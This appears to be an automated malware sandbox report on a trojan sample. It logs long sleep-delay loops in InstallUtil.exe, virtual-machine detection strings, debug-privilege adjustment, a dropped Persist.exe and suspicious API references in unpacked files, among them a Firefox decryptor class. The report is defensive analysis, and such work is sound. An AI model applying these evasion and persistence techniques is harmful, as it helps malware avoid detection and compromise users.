Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595221	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595107	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594993	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594438	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7351	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2470	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1755	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 8097	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8916	Thread sleep count: 7351 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8916	Thread sleep count: 2470 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -599157s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -599032s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -598922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -598024s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -597319s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -597204s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -597079s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -596954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -596829s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -596704s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -596326s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -595221s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -595107s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -594993s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -594641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -594407s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -594282s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -594172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -593938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -593813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8912	Thread sleep time: -593688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9144	Thread sleep count: 1755 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9144	Thread sleep count: 8097 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -598248s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -594563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9140	Thread sleep time: -594438s >= -30000s	Jump to behavior

Source: Persist.exe, 00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: Persist.exe, 00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: InstallUtil.exe, 00000005.00000002.3794365830.0000000001057000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: InstallUtil.exe, 00000001.00000002.3795098672.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior

Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Queries volume information: C:\Users\user\AppData\Roaming\Persist.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
